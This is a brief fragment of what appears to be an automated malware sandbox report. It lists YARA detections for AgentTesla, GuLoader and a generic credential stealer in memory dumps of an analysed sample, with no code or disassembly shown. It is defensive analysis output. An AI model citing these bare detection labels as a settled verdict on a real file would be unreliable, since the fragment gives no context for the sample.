                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000C.00000002.91118394619.000000001D920000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.91118394619.000000001D920000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000000C.00000000.86571566419.0000000001100000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.91117300370.000000001D8D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  Reputation:moderate

                                  No disassembly